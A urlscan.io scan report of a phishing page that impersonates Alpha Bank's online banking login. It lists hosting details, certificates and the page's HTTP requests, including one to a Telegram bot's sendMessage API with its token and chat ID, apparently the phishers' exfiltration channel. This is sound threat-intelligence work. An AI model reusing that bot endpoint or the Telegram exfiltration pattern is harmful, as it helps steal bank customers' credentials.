secure-alpha-497da0be515757web.gidiagents.com Open in urlscan Pro
70.39.233.244 Malicious Activity! Public Scan

Go To Rescan
Add Verdict Report

URL:
https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html
Submission: On November 28 via automatic, source openphish (November 28th 2022, 1:11:21 pm UTC) — Scanned from DE

Summary HTTP 21 Redirects Behaviour Indicators

Summary

This website contacted 2 IPs in 2 countries across 2 domains to perform 21 HTTP transactions. The main IP is 70.39.233.244, located in United States and belongs to GTT-BACKBONE GTT, US. The main domain is secure-alpha-497da0be515757web.gidiagents.com.
TLS certificate: Issued by cPanel, Inc. Certification Authority on September 7th 2022. Valid for: 3 months.

This is the only time secure-alpha-497da0be515757web.gidiagents.com was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Targeting these brands: Alpha Bank (Banking)

Domain & IP information

	IP Address	AS Autonomous System
20	70.39.233.244 70.39.233.244	3257 (GTT-BACKB...) (GTT-BACKBONE GTT)
1	2001:67c:4e8:... 2001:67c:4e8:f004::9	62041 (TELEGRAM) (TELEGRAM)
21	2

20 70.39.233.244 (United States)

ASN3257 (GTT-BACKBONE GTT, US)
PTR: vps66725.inmotionhosting.com

secure-alpha-497da0be515757web.gidiagents.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2001:67c:4e8:f004::9 (Virgin Islands (British))

ASN62041 (TELEGRAM, VG)

api.telegram.org	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

	Apex Domain Subdomains	Transfer
20	gidiagents.com secure-alpha-497da0be515757web.gidiagents.com	1 MB
1	telegram.org api.telegram.org — Cisco Umbrella Rank: 30922
21	2

	Domain	Requested by
20	secure-alpha-497da0be515757web.gidiagents.com	secure-alpha-497da0be515757web.gidiagents.com
1	api.telegram.org	secure-alpha-497da0be515757web.gidiagents.com
21	2

This site contains no links.

Subject Issuer	Validity	Valid
secure-alpha-497da0be515757web.gidiagents.com cPanel, Inc. Certification Authority	`2022-09-07` - `2022-12-06`	3 months	crt.sh
api.telegram.org Go Daddy Secure Certificate Authority - G2	`2022-03-24` - `2023-04-25`	a year	crt.sh

This page contains 1 frames:

Primary Page: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html
Frame ID: B5EFB42877675B791A371AB5E6C3334F
Requests: 21 HTTP requests in this frame

Screenshot
Live screenshot

Full Image

Page Title

myAlpha Web

Page Statistics

21
Requests

100 %
HTTPS

50 %
IPv6

2
Domains

2
Subdomains

2
IPs

2
Countries

1357 kB
Transfer

1355 kB
Size

0
Cookies

0 Outgoing links

These are links going to different origins than the main page.

Redirected requests

There were HTTP redirect chains for the following requests:

21 HTTP transactions
0 data transactions

Method Protocol	Status	Resource Path	Size x-fer	Time Latency	Type MIME-Type	IP Location
GET H/1.1	200 OK	Primary Request Login.html Show response secure-alpha-497da0be515757web.gidiagents.com/web/AL/	7 KB 7 KB	434ms 91ms	Document text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `9e59a659fca8003d3da1cfd2b5bc8fd720c26816aa00eaf8a6359b00c1135f1e` Request headers Upgrade-Insecure-Requests 1 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 accept-language de-DE,de;q=0.9 Response headers Accept-Ranges bytes Connection Keep-Alive Content-Length 7112 Content-Type text/html Date Mon, 28 Nov 2022 13:11:15 GMT Keep-Alive timeout=5, max=100 Last-Modified Sat, 12 Mar 2022 07:50:44 GMT Server Apache
GET H/1.1	200 OK	login secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	174 KB 174 KB	92ms 92ms	Stylesheet text/plain	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `1d8a383f5727476350dc5f199d484548d27adf907c3ec019820a0604821145ce` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:44:30 GMT Server Apache Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=99 Content-Length 177820
GET H/1.1	200 OK	logo.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	3 KB 4 KB	272ms 91ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/logo.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `21503eecb48b62604d6855e33399ab5731f3679a03d412065ea47464de612785` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:36:28 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=100 Content-Length 3350
GET H/1.1	200 OK	lock.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	442 B 684 B	273ms 92ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/lock.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `a9ba69a712ca83a83213bb90a9f821da8c904c9f954eba6c5e7e23bdad6e2c3e` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:36:28 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=100 Content-Length 442
GET H/1.1	200 OK	laptop.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	311 B 553 B	273ms 91ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/laptop.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `a1612606ef48d6a8c375d4a747b8c1fe4f6927e242ec21c449b27ed0325505f2` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:36:28 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=100 Content-Length 311
GET H/1.1	200 OK	email.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	350 B 592 B	274ms 91ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/email.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `ed71ce33d772d291d9c787d26972c89d581a81b6b5e10bfaa8a18173a9877f4c` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:36:28 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=100 Content-Length 350
GET H/1.1	200 OK	phone.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	1 KB 2 KB	274ms 92ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/phone.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `4626e282c2921300f1f087f82643dfe7c3482ef156d4f151d5d892d1a6cb7f49` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:36:28 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=100 Content-Length 1366
GET H/1.1	200 OK	info.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	622 B 863 B	91ms 91ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/info.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `dd892e8748d7c8b9068fc17b082e57ba012a3e1923f8ea0323f4a325e5367e52` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:36:28 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=99 Content-Length 622
GET H/1.1	200 OK	shield.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	675 B 916 B	93ms 92ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/shield.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `b9294cf365d3365ce77692019b950cd5c1c1ea1187aa6cc891b0ee1457578643` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:36:28 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=99 Content-Length 675
GET H2	403	sendMessage api.telegram.org/bot5239022409:AAHpg2ofc5lmqr3e-6klc32cfOWzFUZcpac/	0 0	76ms 32ms	Image application/json	2001:67c:4e8:f004::9 TELEGRAM
General Check archive.org Show headers Download Go to Show image Full URL https://api.telegram.org/bot5239022409:AAHpg2ofc5lmqr3e-6klc32cfOWzFUZcpac/sendMessage?chat_id=5164794198&text=aplpha12 Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/Login.html Protocol H2 Security TLS 1.3, , AES_256_GCM Server 2001:67c:4e8:f004::9 , Virgin Islands (British), ASN62041 (TELEGRAM, VG), Reverse DNS Software / Resource Hash `e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/ User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers
GET H/1.1	200 OK	login-background-stripped@3x.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	162 KB 162 KB	92ms 92ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login-background-stripped@3x.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `a7b625a085dc2e7e3c7c5d882c279d6e6da3a860fb17c041232a575bfe033f1d` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:41:30 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=98 Content-Length 165495
GET H/1.1	200 OK	login-background-elements@3x.png secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/	1006 KB 1006 KB	91ms 91ms	Image image/png	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Show image Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login-background-elements@3x.png Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash `0735fb7399059f96adfcea3b0378e2df6e08488c6b65627e4fb79e1d127b3336` Request headers accept-language de-DE,de;q=0.9 Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Last-Modified Tue, 11 May 2021 18:42:10 GMT Server Apache Content-Type image/png Connection Keep-Alive Accept-Ranges bytes Keep-Alive timeout=5, max=98 Content-Length 1029774
GET H/1.1	500 Internal Server Error	OpenSans-Regular.woff2 secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/	0 0	92ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/OpenSans-Regular.woff2 Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Bold_1.woff2 secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/	0 0	91ms 91ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold_1.woff2 Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Bold_1.woff secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/	0 0	93ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold_1.woff Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Regular.woff secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/	0 0	93ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/OpenSans-Regular.woff Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Bold_1.ttf secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/	0 0	268ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold_1.ttf Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Regular.ttf secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/	0 0	275ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/OpenSans-Regular.ttf Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Bold.woff2 secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/	0 0	93ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold.woff2 Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Bold.woff secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/	0 0	93ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold.woff Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:16 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1
GET H/1.1	500 Internal Server Error	OpenSans-Bold.ttf secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/	0 0	273ms 92ms	Font text/html	70.39.233.244 GTT-BACKBONE GTT
General Check archive.org Show headers Download Go to Full URL https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold.ttf Requested by Host: secure-alpha-497da0be515757web.gidiagents.com URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Protocol HTTP/1.1 Security TLS 1.3, , AES_128_GCM Server 70.39.233.244 , United States, ASN3257 (GTT-BACKBONE GTT, US), Reverse DNS vps66725.inmotionhosting.com Software Apache / Resource Hash Request headers Referer https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/style/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1 Origin https://secure-alpha-497da0be515757web.gidiagents.com accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36 Response headers Date Mon, 28 Nov 2022 13:11:17 GMT Server Apache Connection close Content-Length 699 Content-Type text/html; charset=iso-8859-1

Verdicts & Comments Add Verdict or Comment

Potentially malicious activity detected
